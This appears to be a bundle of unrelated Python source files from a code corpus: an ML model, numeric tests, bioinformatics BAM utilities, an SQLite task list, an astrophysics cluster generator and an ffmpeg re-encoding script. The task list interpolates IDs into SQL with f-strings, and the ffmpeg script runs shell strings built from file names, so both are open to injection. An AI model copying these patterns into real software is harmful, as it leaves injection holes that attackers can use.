IIR_noise_variance, first_IIR_noise_variance, second_IIR_noise_variance = calculateNoiseVariancePerFilter(samples, half_IIR_samples, IIR_samples, IIR_samples) # Calculate the noise removed by the IIR filter
window_noise_variance, first_window_noise_variance, second_window_noise_variance = calculateNoiseVariancePerFilter(samples, half_windowed_samples, full_windowed_samples, overall_windowed_samples) # Calculate the noise removed by the window filter
optimal_noise_variance, first_optimal_noise_variance, second_optimal_noise_variance = calculateNoiseVariancePerFilter(samples, half_IIR_samples, full_optimal_samples, overall_optimal_samples) # Calculate the noise removed by the optimal filter
freq_noise_variance, first_freq_noise_variance, second_freq_noise_variance = calculateNoiseVariancePerFilter(samples, half_freq_samples, full_freq_samples, overall_freq_samples) # Calculate the noise removed by the frequency sampling filter
# Save noise power to a .txt file
noise_power_data = {FILTER_NAMES[0]: IIR_noise_variance, FILTER_NAMES[1]: first_IIR_noise_variance,
FILTER_NAMES[2]: second_IIR_noise_variance, FILTER_NAMES[3]: window_noise_variance,
FILTER_NAMES[4]: first_window_noise_variance, FILTER_NAMES[5]: second_window_noise_variance,
FILTER_NAMES[6]: optimal_noise_variance, FILTER_NAMES[7]: first_optimal_noise_variance,
FILTER_NAMES[8]: second_optimal_noise_variance, FILTER_NAMES[9]: freq_noise_variance,
FILTER_NAMES[10]: first_freq_noise_variance, FILTER_NAMES[11]: second_freq_noise_variance} # Create a dictionary of the filter name and its noise power
saveNoisePowerData(noise_power_data, NOISE_POWER_OUTPUT_FILENAME) # Save the data about each filter to a file
# Run program if called
if __name__ == '__main__':
main() |
<filename>mmf/models/cnn_lstm.py
from copy import deepcopy
import torch
from torch import nn
from mmf.common.registry import registry
from mmf.models.base_model import BaseModel
from mmf.modules.layers import ClassifierLayer, ConvNet, Flatten
_TEMPLATES = {
"question_vocab_size": "{}_text_vocab_size",
"number_of_answers": "{}_num_final_outputs",
}
_CONSTANTS = {"hidden_state_warning": "hidden state (final) should have 1st dim as 2"}
@registry.register_model("cnn_lstm")
class CNNLSTM(BaseModel):
"""CNNLSTM is a simple model for vision and language tasks. CNNLSTM is supposed to act
as a baseline to test out your stuff without any complex functionality. Passes image
through a CNN, and text through an LSTM and fuses them using concatenation. Then, it finally
passes the fused representation from a MLP to generate scores for each of the possible answers.
Args:
config (DictConfig): Configuration node containing all of the necessary config required
to initialize CNNLSTM.
Inputs: sample_list (SampleList)
- **sample_list** should contain image attribute for image, text for question split into
word indices, targets for answer scores
"""
def __init__(self, config):
super().__init__(config)
self._global_config = registry.get("config")
self._datasets = self._global_config.datasets.split(",")
@classmethod
def config_path(cls):
return "configs/models/cnn_lstm/defaults.yaml"
def build(self):
assert len(self._datasets) > 0
num_question_choices = registry.get(
_TEMPLATES["question_vocab_size"].format(self._datasets[0])
)
num_answer_choices = registry.get(
_TEMPLATES["number_of_answers"].format(self._datasets[0])
)
self.text_embedding = nn.Embedding(
num_question_choices, self.config.text_embedding.embedding_dim
)
self.lstm = nn.LSTM(**self.config.lstm)
layers_config = self.config.cnn.layers
conv_layers = []
for i in range(len(layers_config.input_dims)):
conv_layers.append(
ConvNet(
layers_config.input_dims[i],
layers_config.output_dims[i],
kernel_size=layers_config.kernel_sizes[i],
)
)
conv_layers.append(Flatten())
self.cnn = nn.Sequential(*conv_layers)
# As we generate output dim dynamically, we need to copy the config
# to update it
classifier_config = deepcopy(self.config.classifier)
classifier_config.params.out_dim = num_answer_choices
self.classifier = ClassifierLayer(
classifier_config.type, **classifier_config.params
)
def forward(self, sample_list):
self.lstm.flatten_parameters()
question = sample_list.text
image = sample_list.image
# Get (h_n, c_n), last hidden and cell state
_, hidden = self.lstm(self.text_embedding(question))
# X x B x H => B x X x H where X = num_layers * num_directions
hidden = hidden[0].transpose(0, 1)
# X should be 2 so we can merge in that dimension
assert hidden.size(1) == 2, _CONSTANTS["hidden_state_warning"]
hidden = torch.cat([hidden[:, 0, :], hidden[:, 1, :]], dim=-1)
image = self.cnn(image)
# Fuse into single dimension
fused = torch.cat([hidden, image], dim=-1)
scores = self.classifier(fused)
return {"scores": scores}
|
<reponame>laekov/akg
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""dense_run"""
import numpy as np
from akg.utils import kernel_exec as utils
from test_op import dense
from tensorio import compare_tensor
from gen_random import random_gaussian
def dense_run(batch, in_dim, out_dim, dtype, bias, attrs):
"""run function for dsl function dense."""
op_attrs = [bias]
if 'tuning' in attrs.keys():
t = attrs.get("tuning", False)
kernel_name = attrs.get("kernel_name", False)
d1 = random_gaussian((batch, in_dim), miu=1, sigma=0.1).astype(dtype)
w1 = random_gaussian((out_dim, in_dim), miu=1, sigma=0.1).astype(dtype)
w2 = w1.transpose().copy()
if bias:
b1 = random_gaussian((out_dim), miu=1, sigma=0.1).astype(dtype)
mod = utils.op_build_test(dense.dense, [d1.shape, w1.shape, b1.shape], [dtype, dtype, dtype], op_attrs,
kernel_name=kernel_name, attrs=attrs, tuning=t)
if t:
exp_output = np.dot(d1, w2)
# inputs and output to hold the data
output = np.full(exp_output.shape, np.nan, dtype)
for o in range(out_dim):
exp_output[:, o] += b1[o]
args = [d1, w1, b1, output]
return mod, exp_output, args
return mod
else:
mod = utils.op_build_test(dense.dense, [d1.shape, w1.shape], [dtype, dtype], op_attrs,
kernel_name=kernel_name, attrs=attrs, tuning=t)
if t:
exp_output = np.dot(d1, w2)
# inputs and output to hold the data
output = np.full(exp_output.shape, np.nan, dtype)
args = [d1, w1, output]
return mod, exp_output, args
else:
return mod
d1 = random_gaussian((batch, in_dim), miu=1, sigma=0.1).astype(dtype)
w1 = random_gaussian((out_dim, in_dim), miu=1, sigma=0.1).astype(dtype)
w2 = w1.transpose().copy()
exp_output = np.dot(d1, w2)
# inputs and output to hold the data
output = np.full(exp_output.shape, np.nan, dtype)
if bias:
b1 = random_gaussian((out_dim), miu=1, sigma=0.1).astype(dtype)
for o in range(out_dim):
exp_output[:, o] += b1[o]
inputs = [d1, w1, b1]
args = [d1, w1, b1, output]
mod = utils.op_build_test(dense.dense, [d1.shape, w1.shape, b1.shape], [dtype, dtype, dtype], op_attrs,
kernel_name='dense', attrs=attrs)
else:
inputs = [d1, w1]
args = [d1, w1, output]
mod = utils.op_build_test(dense.dense, [d1.shape, w1.shape], [dtype, dtype], op_attrs, kernel_name='dense',
attrs=attrs)
acu_output = utils.mod_launch(mod, args, expect=exp_output)
# compare result
compare_result = compare_tensor(acu_output, exp_output, rtol=5e-03, equal_nan=True)
return inputs, acu_output, exp_output, compare_result
|
<filename>src/longbow/utils/bam_utils.py<gh_stars>0
import sys
import os
import gzip
import re
import logging
import click_log
import collections
import re
from collections import OrderedDict
from math import ceil, floor
from construct import *
from inspect import getframeinfo, currentframe, getdoc
import pysam
from ..meta import VERSION
from ..utils.model import reverse_complement
logging.basicConfig(stream=sys.stderr)
logger = logging.getLogger("bam_utils")
click_log.basic_config(logger)
PB_READ_NAME_RE = re.compile("m[0-9]+e?_[0-9]{6}_[0-9]{6}/[0-9]+/.*")
# Constants for bam file reading / writing:
SEGMENTS_TAG = "SG"
SEGMENTS_QUAL_TAG = "XQ"
SEGMENTS_RC_TAG = "RC"
SEGMENT_TAG_DELIMITER = ","
READ_MODEL_NAME_TAG = "YN"
READ_MODEL_SCORE_TAG = "YS"
READ_IS_VALID_FOR_MODEL_TAG = "YV"
READ_FIRST_KEY_SEG_TAG = "YK"
READ_NUM_KEY_SEGMENTS_TAG = "YG"
READ_APPROX_QUAL_TAG = "YQ"
READ_UMI_TAG = ""
# Named tuple to store alignment information:
class SegmentInfo(collections.namedtuple("SegmentInfo", ["name", "start", "end"])):
_tag_regex = re.compile(r"(.*?):(\d+)-(\d+)")
def __len__(self):
return self.end - self.start
def __str__(self):
return f"SegmentInfo({self.to_tag()})"
def to_tag(self):
return f"{self.name}:{self.start}-{self.end}"
@classmethod
def from_tag(cls, tag_string):
match = cls._tag_regex.match(tag_string)
return SegmentInfo(match[1], int(match[2]), int(match[3]))
def load_read_count(pbi_file):
"""Compute file offsets for specified read names"""
# Decode PacBio .pbi file. This is not a full decode of the index, only the parts we need
# until we get to the read count.
# More on index format at https://pacbiofileformats.readthedocs.io/en/9.0/PacBioBamIndex.html .
fmt = Struct(
# Header
"magic" / Const(b"PBI\x01"),
"version_patch" / Int8ul,
"version_minor" / Int8ul,
"version_major" / Int8ul,
"version_empty" / Int8ul,
"pbi_flags" / Int16ul,
"n_reads" / Int32ul,
)
with gzip.open(pbi_file, "rb") as f:
idx_contents = fmt.parse_stream(f)
return idx_contents.n_reads
def compute_shard_offsets(pbi_file, num_shards):
"""
Compute all possible shard offsets (keeping adjacent reads from the ZMW together)
"""
# Decode PacBio .pbi file. This is not a full decode of the index, only the parts we need for sharding.
# More on index format at https://pacbiofileformats.readthedocs.io/en/9.0/PacBioBamIndex.html .
fmt = Struct(
# Header
"magic" / Const(b"PBI\x01"),
"version_patch" / Int8ul,
"version_minor" / Int8ul,
"version_major" / Int8ul,
"version_empty" / Int8ul,
"pbi_flags" / Int16ul,
"n_reads" / Int32ul,
"reserved" / Padding(18),
# Basic information section (columnar format)
"rgId" / Padding(this.n_reads * 4),
"qStart" / Padding(this.n_reads * 4),
"qEnd" / Padding(this.n_reads * 4),
"holeNumber" / Array(this.n_reads, Int32sl),
"readQual" / Padding(this.n_reads * 4),
"ctxtFlag" / Padding(this.n_reads * 1),
"fileOffset" / Array(this.n_reads, Int64sl),
)
# Make a list of bgzf virtual file offsets for sharding and store ZMW counts.
file_offsets_hash = OrderedDict()
last_offset = 0
zmw_count_hash = dict()
with gzip.open(pbi_file, "rb") as f:
idx_contents = fmt.parse_stream(f)
for j in range(0, idx_contents.n_reads):
# Save only the virtual file offset for the first ZMW hole number, so
# that shard boundaries always keep reads from the same ZMW together.
if idx_contents.holeNumber[j] not in file_offsets_hash:
file_offsets_hash[idx_contents.holeNumber[j]] = idx_contents.fileOffset[j]
last_offset = idx_contents.fileOffset[j]
try:
zmw_count_hash[idx_contents.holeNumber[j]] += 1
except KeyError:
zmw_count_hash[idx_contents.holeNumber[j]] = 1
file_offsets = list(file_offsets_hash.values())
shard_offsets = []
read_counts = []
for j in range(0, len(file_offsets), ceil(len(file_offsets) / num_shards)):
shard_offsets.append(file_offsets[j])
read_counts.append(ceil(len(file_offsets) / num_shards))
# For the last read in the file, pad the offset so the final comparison in write_shard() retains the final read.
shard_offsets.append(os.path.getsize(pbi_file) + 1)
return shard_offsets, zmw_count_hash, idx_contents.n_reads, read_counts
def create_bam_header_with_program_group(command_name, base_bam_header, description=None, models=None):
"""Create a pysam.AlignmentHeader object with program group (PG) information populated by the given arguments.
This function is intended to be called from the 'main' function of a longbow subcommand because it uses reflection
to pull in the first line of the docstring from the main function as the description (DS field)."""
bam_header_dict = base_bam_header.to_dict()
if not description:
prev_frame = currentframe().f_back
description = getdoc(prev_frame.f_globals['main']).split("\n")[0]
# If we have a model here, we should add the description of the model to our program group:
if models:
description = description + " MODEL(s): " + ", ".join([m.to_json(indent=None) for m in models])
# Add our program group to it:
pg_dict = {
"ID": f"longbow-{command_name}-{VERSION}",
"PN": "longbow",
"VN": f"{VERSION}",
# Use reflection to get the first line of the doc string the caller - the main function for our header:
"DS": description,
"CL": " ".join(sys.argv),
}
if "PG" in bam_header_dict:
bam_header_dict["PG"].append(pg_dict)
else:
bam_header_dict["PG"] = [pg_dict]
out_header = pysam.AlignmentHeader.from_dict(bam_header_dict)
return out_header
def check_for_preexisting_files(file_list, exist_ok=False):
"""Checks if the files in the given file_list exist.
If any file exists and exist_ok is False, this will exit the program.
If any file exists and exist_ok is True, the program will continue.
"""
# Allow users to be a little lazy with what input types they give:
if not isinstance(file_list, list) and not isinstance(file_list, set):
file_list = [file_list]
do_files_exist = False
for f in file_list:
if os.path.exists(f):
if exist_ok:
logger.warning(f"Output file exists: {f}. Overwriting.")
else:
logger.error(f"Output file already exists: {f}!")
do_files_exist = True
if do_files_exist:
sys.exit(1)
def get_segment_score(read_sequence, segment, model, ssw_aligner=None):
"""Get the alignment score of the given segment against the read sequence."""
# We don't score random segments:
if segment.name == "random":
return 0, 0
# Create a default aligner if we weren't given one:
if not ssw_aligner:
ssw_aligner = ssw.Aligner()
# Get our alignment and our score:
if segment.end - segment.start > 1:
alignment = ssw_aligner.align(read_sequence[segment.start:segment.end], model.adapter_dict[segment.name])
optimal_score = alignment.score
else:
optimal_score = 0
# The max score is the match score * the length of the reference segment
max_score = len(model.adapter_dict[segment.name]) * ssw_aligner.matrix.get_match()
return optimal_score, max_score
def collapse_annotations(path):
"""Collapses given path into a list of SegmentInfo objects."""
last = ""
start = 0
segments = []
i = 0
for i, seg in enumerate(path):
if seg != last:
if i != 0:
segments.append(SegmentInfo(last, start, i - 1))
last = seg
start = i
# Don't forget the last one:
segments.append(SegmentInfo(last, start, i))
return segments
def write_annotated_read(read, segments, is_rc, logp, model, ssw_aligner, out_bam_file):
"""Write the given pysam.AlignedSegment read object to the given file with the given metadata."""
# Obligatory log message:
logger.debug(
"Path for read %s (%2.2f)%s: %s",
read.query_name,
logp,
" (RC)" if is_rc else "",
segments,
)
# Set our tag and write out the read to the annotated file:
read.set_tag(SEGMENTS_TAG, SEGMENT_TAG_DELIMITER.join([s.to_tag() for s in segments]))
# Set the model info tags:
read.set_tag(READ_MODEL_SCORE_TAG, logp)
read.set_tag(READ_MODEL_NAME_TAG, model.name)
# If we're reverse complemented, we make it easy and just reverse complement the read and add a tag saying
# that the read was RC:
read.set_tag(SEGMENTS_RC_TAG, is_rc)
if is_rc:
quals = read.query_qualities[::-1]
seq = reverse_complement(read.query_sequence)
read.query_sequence = seq
read.query_qualities = quals
# Get our segment scores and set them:
total_score = 0
total_max_score = 0
score_strings = []
for s in segments:
score, max_score = get_segment_score(read.query_sequence, s, model, ssw_aligner)
score_strings.append(f"{score}/{max_score}")
total_score += score
total_max_score += max_score
read.set_tag(SEGMENTS_QUAL_TAG, SEGMENT_TAG_DELIMITER.join(score_strings))
if total_max_score != 0:
read.set_tag(READ_APPROX_QUAL_TAG, f"{total_score / total_max_score:.4f}")
else:
read.set_tag(READ_APPROX_QUAL_TAG, f"0.0")
out_bam_file.write(read)
|
import logger
import os
import json
import time
from datetime import datetime
from datetime import time
from operator import itemgetter
import sqlite3
from typing import List, Tuple
#this is used for storing a list of tasks as well as adding them
class TaskCollection(object):
# constructor
def __init__(self):
#creates a connection to the database and creates a database file
self.conn = sqlite3.connect('user_data.db')
self.curs = self.conn.cursor()
#creates a table to hold tasks if one doesn't exist
with self.conn:
self.curs.execute("CREATE TABLE IF NOT EXISTS tasks(id_number TEXT, task_name TEXT, time_due TEXT, time_made TEXT, notifications TEXT)")
logger.log("User_Tasks Created")
# adds a task to the sqlite database
def add_task(self, task_name: str, time_due: datetime, time_made: datetime, id_number: str, notifications: List[datetime.time] = []) -> None:
'''
adds a task with parameters, uses today as default time_made parameter
'''
# new sqlite stuff
with self.conn:
self.curs.execute("INSERT INTO tasks(id_number, task_name, time_due, time_made, notifications) VALUES(?, ?, ?, ?, ?)",
(id_number, task_name, time_due.strftime('%m-%d-%Y, %H:%M:%S'), time_made.strftime('%m-%d-%Y, %H:%M:%S'), self.serialize_notifications(notifications)))
print(self.serialize_notifications(notifications))
logger.log("Adding Task")
# edits a task in the sqlite database
def edit_task(self, task_id: str, name_change: str, date_change: datetime, notifications: List[datetime.time] = []) -> None:
'''
calls the edit_name and edit_due_date functions with parameters passed in
'''
#edits the task row in the tasks table
with self.conn:
#self.curs.execute(f"UPDATE tasks SET task_name='{name_change}', time_due='{date_change.strftime('%m-%d-%Y, %H:%M:%S')}', notifications='{self.serialize_notifications(notifications)}' WHERE id_number='{task_id}';")
self.curs.execute(f"UPDATE tasks SET task_name = ?, time_due = ?, notifications = ? WHERE id_number = ?",
(name_change, date_change.strftime('%m-%d-%Y, %H:%M:%S'), self.serialize_notifications(notifications), task_id))
logger.log("Editing Task")
# deletes a task in the sqlite database
def delete_task(self, task_id: str) -> None:
'''
removes task from the list
'''
#deletes row in tasks table
with self.conn:
self.curs.execute(f"DELETE FROM tasks WHERE id_number='{task_id}';")
# logs
logger.log("Deleted Task")
# returns a list of lists, each list in the list is a task's data (add decorators in the future for this, or something idk just make it look less trash if possible)
def get_tasks(self, order: str = 'da') -> List[Tuple[str, str, datetime, datetime]]:
def get_by_alphabetic():
self.curs.execute("SELECT * FROM tasks ORDER BY task_name")
logger.log("Sorted Alphabetically")
def get_by_time_remaining_asc():
self.curs.execute("SELECT * FROM tasks ORDER BY DATETIME(time_due) DESC")
logger.log("Sorted by Time")
def get_by_time_remaining_desc():
self.curs.execute("SELECT * FROM tasks ORDER BY DATETIME(time_due) ASC")
logger.log("Sorted by Reverse Time")
def get_by_date_added():
self.curs.execute("SELECT * FROM tasks ORDER BY DATETIME(time_made) ASC")
logger.log("Sorted by Add Date")
with self.conn:
if order=='alpha':
get_by_alphabetic()
elif order=='tra':
get_by_time_remaining_asc()
elif order=='trd':
get_by_time_remaining_desc()
else:
get_by_date_added()
all_tasks = self.curs.fetchall()
return [[task[0], task[1], datetime.strptime(task[2], "%m-%d-%Y, %H:%M:%S"), datetime.strptime(task[3], "%m-%d-%Y, %H:%M:%S"), self.deserialize_notifications(task[4])] for task in all_tasks]
# returns a list of a task's data
def get_task(self, task_id: str) -> Tuple[str, str, datetime, datetime]:
with self.conn:
self.curs.execute(f"SELECT * FROM tasks WHERE id_number='{task_id}';")
task = self.curs.fetchall()[0]
return [task[0], task[1], datetime.strptime(task[2], "%m-%d-%Y, %H:%M:%S"), datetime.strptime(task[3], "%m-%d-%Y, %H:%M:%S"), self.deserialize_notifications(task[4])]
# returns a list of datetimes
def get_notifications(self, task_id: str) -> List[datetime.time]:
with self.conn:
self.curs.execute(f"SELECT notifications FROM tasks WHERE id_number = '{task_id}'")
return self.deserialize_notifications(self.curs.fetchall()[0][0])
#takes in a list of datetimes and returns a string in json format
def serialize_notifications(self, times: List[datetime.time] = []) -> str:
return str([time.strftime('%H:%M') for time in times])[1:-1]
#takes in a "list" of strings and returns a list of datetimes
def deserialize_notifications(self, times: str) -> List[datetime.time]:
if times == '':
return []
new_times = times.split(',')
return [datetime.strptime(time.lstrip()[1:-1], '%H:%M').time() for time in new_times]
|
"""
This program generates positions of stars born through a fractal tree
(see Goodwin, Whitworth 2004)
"""
import numpy as np
from random import *
from matplotlib import pyplot as plt
import itertools
from copy import deepcopy
from nb6.pysnap import PySnap
import cluster_models as CM
from cluster_models import salpeter
from energy import virialise
class Leaf(object):
"""
Basis unit of the fractal tree.
Contains a recursive self-replicating method (GrowNextLeaves)
"""
coords = np.array([[ 1, 1,-1], [-1, 1, 1], [-1,-1, 1], [ 1,-1,-1],
[ 1,-1, 1], [-1, 1,-1], [ 1, 1, 1], [-1,-1,-1]])
def __init__(self,position,level):
self.position = position
self.level = level
self.LastLeaf = True
self.mass = None
self.velocity = None
def GenerateNewLeafPosition(self,length,noise,C):
return [self.position[0] + C[0] * length/4. + np.random.normal(0,noise*length),
self.position[1] + C[1] * length/4. + np.random.normal(0,noise*length),
self.position[2] + C[2] * length/4. + np.random.normal(0,noise*length)]
def GenerateNewLeaves(self,length,dimension,noise):
"""
Computes 8 random numbers, compares to the creation probability that
is computed from the fractal domension, then create child leaves to the
current leaves.
"""
P = np.random.random(8) < 2**(dimension-3)
self.ChildLeaves = []
for C in Leaf.coords[P]:
NewPositions = self.GenerateNewLeafPosition(length,noise,C)
self.ChildLeaves.append( Leaf(NewPositions, self.level+1))
if len(self.ChildLeaves) is not 0:
self.LastLeaf = False
def GrowNextLeaves(self,nlevel,length,noise,dimension):
"""
Create child leaves and go into child leaves to create
"grand-child" leaves, and so on util nlevel layers of
leaves are created.
"""
self.GenerateNewLeaves(length,dimension,noise)
for C in self.ChildLeaves:
if C.level < self.level + nlevel:
C.GrowNextLeaves(nlevel-1,length/2.,noise,dimension)
def PrintLeaf(self,prefix=""):
x,y,z = self.position[0], self.position[1], self.position[2]
print prefix+" "+str(x)+" "+str(y)+" "+str(z)
if not self.LastLeaf:
for L in self.ChildLeaves:
L.PrintLeaf(prefix=prefix+" | ")
def CollectLeaves(self,level,RequestedLeaves=None):
"""
Grabs all leaves objects at a specified level
"""
if RequestedLeaves is None:
RequestedLeaves =[]
for C in self.ChildLeaves:
if C.level == level:
RequestedLeaves.append(C)
else:
RequestedLeaves = C.CollectLeaves(level,RequestedLeaves=RequestedLeaves)
return RequestedLeaves
def GetDescendingMass(self,TotalMass=None):
"""
Go down the fractal tree, adding any mass present in leaves at each level.
"""
if TotalMass is None:
TotalMass = 0
LocalMass = 0
for C in self.ChildLeaves:
if C.mass is not None:
LocalMass += C.mass
else:
LocalMass += C.GetDescendingMass(TotalMass=LocalMass)
self.mass = LocalMass
return LocalMass
def GetChildPositions(self):
r = []
for C in self.ChildLeaves:
r.append(C.position)
return np.array(r)
def GetChildMasses(self):
m = []
for C in self.ChildLeaves:
m.append(C.mass)
return np.array(m)
def GetChildVelocities(self):
v = []
for C in self.ChildLeaves:
v.append(C.velocity)
return np.array(v)
def VirialiseChild(self,Q):
"""Virialise the child leaves velocities to match the resquested Q"""
if self.level == 0:
self.velocity = np.array([0.,0.,0.])
if not self.LastLeaf :
if len(self.ChildLeaves) is not 1:
m = self.GetChildMasses()
x,y,z = np.transpose( self.GetChildPositions() )
vx,vy,vz = np.transpose(np.random.normal(0.,1.0,(len(self.ChildLeaves),3)))
v = np.array([ [VX,VY,VZ] for (VX,VY,VZ) in zip(vx,vy,vz)])
for (vv,C) in zip(v,self.ChildLeaves):
C.velocity = vv
C.VirialiseChild(Q)
else:
self.ChildLeaves[0].velocity = self.velocity
self.ChildLeaves[0].VirialiseChild(Q)
def TransmitVelocity(self):
"""Apply inheritance of velocity from parent to child"""
if not self.LastLeaf:
for C in self.ChildLeaves:
C.velocity += self.velocity
C.TransmitVelocity()
def FillIndices(self,level,inc=0):
indices = []
for C in self.ChildLeaves:
if C.level == level:
inc +=1
indices.append(inc)
else:
if len(C.ChildLeaves) is not 0:
ind, inc = C.FillIndices(level,inc=inc)
indices.append(ind)
if self.level == 0:
return indices
else:
return indices, inc
class FractalTree(object):
"""
Tree = FractalTree( nlevel, dimension, noise, length=1.0)
---------------------------------------------
nlevel : how many layers of leaves
dimension : fractal dimension, must be <3. Leaf spawning depends on
the probability 2^(dimension-3). Can be seen as a
reversed filling factor: 3 is full filling, no fractality.
noise : To avoid grid aspect, some noise is applied to positions
at each generation.
length : Side length of total system.
mass_range : Stellar mass function. Same than standard cluster creation
alpha : Stellar mass function. Same than standard cluster creation
Generate a fractal tree made of Leaf objects. The final number of particles
is uncertain, trial and error is advised to see how fractal tree building work.
"""
def __init__(self,nlevel,dimension,noise,length = 1.0,
mass_range=[0.35,20], alpha=2.37, AttributeVelocities=True):
self.nlevel = nlevel
self.N = 0
while self.N is 0:
self.Leaf = Leaf([0,0,0],0)
self.Leaf.GrowNextLeaves(nlevel,length,noise,dimension)
self.particles = self.Leaf.CollectLeaves(self.nlevel)
self.N = len(self.particles)
self.AttributeMasses(mass_range,alpha)
def GetVelocities(self):
self.velocities = [[L.velocity[0],L.velocity[1],L.velocity[2]]
for L in self.particles ]
return np.array(self.velocities)
def GetPositions(self):
self.positions = [ [L.position[0],L.position[1],L.position[2]]
for L in self.particles ]
return np.array(self.positions)
def Plot(self,**kwargs):
P = self.GetPositions()
fig = plt.figure(figsize=(9,9))
ax = fig.add_subplot(111,projection="3d")
ax.plot(P[:,0],P[:,1],P[:,2],"o",markersize=2,**kwargs)
plt.tight_layout()
plt.show()
def AttributeMasses(self,mass_range=[0.2,20],alpha=2.37):
masses = CM.salpeter(self.N,alpha,mass_range)
self.O_masses = deepcopy(masses)
self.masses = masses/masses.sum()
for m,p in zip(masses,self.particles):
p.mass = m
self.Mt = masses.sum()
self.Leaf.GetDescendingMass()
def Snap(self,AttributeVelocities=True):
"""
Convert Fractal tree to PySnap.
"""
if AttributeVelocities:
self.Leaf.VirialiseChild(0.5)
self.Leaf.TransmitVelocity()
v = self.GetVelocities()
else:
v = np.zeros((self.N,3))
r = self.GetPositions()
S = PySnap(0,range(1,self.N+1),self.masses,r[:,0],r[:,1],r[:,2],
v[:,0],v[:,1],v[:,2])
S.Leaf = self.Leaf
return S
def FractalModel(nlevel=5, dimension=2.0, noise=0.5,
length=1.0, mass_range=[0.2,20],Velocities=True):
"""
Sf = FractalTree( nlevel, dimension, noise, length=1.0)
---------------------------------------------
nlevel : how many layers of leaves
dimension : fractal dimension, must be <3. Leaf spawning depends on
the probability 2^(dimension-3). Can be seen as a
reversed filling factor: 3 is full filling, no fractality.
noise : To avoid grid aspect, some noise is applied to positions
at each generation.
length : Side length of total system.
mass_range : Stellar mass function. Same than standard cluster creation
alpha : Stellar mass function. Same than standard cluster creation
Generate PySnap of a fractal model, then virialise it.
The final number of particles is uncertain, trial and error is advised to see
how fractal tree building work.
"""
T = FractalTree(nlevel,dimension,noise,AttributeVelocities=Velocities,mass_range=mass_range)
print T.N, " particles created"
S = T.Snap()
S.Tree = T
S.virialise(0.5)
return S
|
import os
from pymediainfo import MediaInfo
filetuple = os.walk(r'./')
#走显存编码,可选qsv/cuda/nvenc/amf,使用qsv时需保证没有独立显卡(特别是N卡),否则会报错,是bug,来自[#6996(尝试在 Windows 10 上使用 NVidia 主 GPU 支持的 Intel 系统上使用 QSV 会导致崩溃)– FFmpeg](https://trac.ffmpeg.org/ticket/6996),不用可置空。
hwaccel=''
#hwaccel=r' -hwaccel qsv '
#解码方法,可用h264_cuvid/h264_amf/h264_qsv/libx264,不用可置空。
#self_decodec=''
self_decodec=r' -c:v h264_qsv '
#解码方法,可用h264_nvenc/h264_amf/h264_qsv/libx264
#self_encodec=''
self_encodec=r' -c:v h264_qsv '
#码率(单位kbps)
destiny_bitrate=4000
#目标大小(MB)
destiny_space=200
#目标帧数
fps=r'23'
#目标格式
format=r'.mp4'
#转换命令
def change_bat(file_name,extension,bit_rate,height):
command=r'ffmpeg'+hwaccel+self_decodec+r'-i "'+file_name+extension+r'"'+self_encodec+r' -b:v '+str(bit_rate)+r' -vf scale=-1:'+str(height)+r' -r '+fps+r' -y "'+file_name+r'_convert'+format+r'"'
os.system(command)
#获取码率
def detect_bit_rate(file_name):
command=r'ffprobe -i "'+file_name+r'" -show_entries format=bit_rate -v quiet -of csv="p=0"'
bit_rate=os.popen(command).read().split()[0]
return bit_rate
#获取视频高度
def detect_height(file_name):
command=r'ffprobe -i "'+file_name+r'" -show_entries stream=height -v quiet -of csv="p=0"'
height=os.popen(command).read().split()[0]
return height
for path,dir_list,files in filetuple:
for file in files:
try:
path=path.strip('./')
if(path!=''):
file=os.path.join(path,file)
fullfilename=file
#排除非视频文件
fileInfo = MediaInfo.parse(file)
for track in fileInfo.tracks:
if track.track_type == 'Video':
#获取拓展名
(file, extension) = os.path.splitext(file)
#已转换/直接更名的视频直接跳过
if(not fullfilename.endswith(r'convert'+format) and not os.path.exists(file+r'_convert'+format) and not fullfilename.endswith(r'convert'+extension) and not os.path.exists(file+r'_noconvert'+extension)):
if(os.path.getsize(file+extension)>destiny_space*1024*1024):
#第一次转换,大于目标大小的,码率缩到目标码率,高度缩到1080,若码率和高度均一低于目标码率,则取源文件码率/高度,然后缩减帧率,转换
bit_rate= int(detect_bit_rate(file+extension))
height=detect_height(file+extension)
if(bit_rate>destiny_bitrate*1000):
bit_rate=destiny_bitrate*1000
if(int(height)>1080):
height='1080'
print("初次转换视频码率为:"+str(bit_rate/1000)+"kbps")
change_bat(file,extension,bit_rate,height)
#第一次转换后文件仍大于目标大小的,则进入循环转换流程,每次转换码率和高度会同时缩减到上次转换的80%,直到大小低于目标大小为止
while(os.path.getsize(file+r'_convert'+format)>destiny_space*1024*1024):
bit_rate=int(bit_rate)*4/5;
height=int(height)*4/5;
print("本次转换视频码率为:"+str(int(bit_rate/1000))+"kbps,视频宽度为:"+str(height)+"px")
change_bat(file,extension,bit_rate,height)
else:
#未转换,直接复制更名,便于后续筛选
all_path=r'copy /y "'+file+extension+r'" "' +file+r'_noconvert'+extension+r'"'
os.system(all_path)
except:
continue
|
import sys
sys.path.insert(1, "../../../")
import h2o
import numpy as np
import random
import math
import scipy.special
def vec_math_ops(ip,port):
sin_cos_tan_atan_sinh_cosh_tanh_asinh_data = [[random.uniform(-10,10) for r in range(10)] for c in range(10)]
asin_acos_atanh_data = [[random.uniform(-1,1) for r in range(10)] for c in range(10)]
acosh_data = [[random.uniform(1,10) for r in range(10)] for c in range(10)]
abs_data = [[random.uniform(-100000,0) for r in range(10)] for c in range(10)]
zero_one_data = [random.randint(0,1) for c in range(10)]
zero_one_data = [zero_one_data, zero_one_data]
h2o_data1 = h2o.H2OFrame(python_obj=sin_cos_tan_atan_sinh_cosh_tanh_asinh_data)
h2o_data2 = h2o.H2OFrame(python_obj=asin_acos_atanh_data)
h2o_data3 = h2o.H2OFrame(python_obj=acosh_data)
h2o_data4 = h2o.H2OFrame(python_obj=abs_data)
h2o_data5 = h2o.H2OFrame(python_obj=zero_one_data)
np_data1 = np.array(sin_cos_tan_atan_sinh_cosh_tanh_asinh_data)
np_data2 = np.array(asin_acos_atanh_data)
np_data3 = np.array(acosh_data)
np_data4 = np.array(abs_data)
np_data5 = np.array(zero_one_data)
row, col = h2o_data1.dim
c = random.randint(0,col-1)
for d in range(1,6):
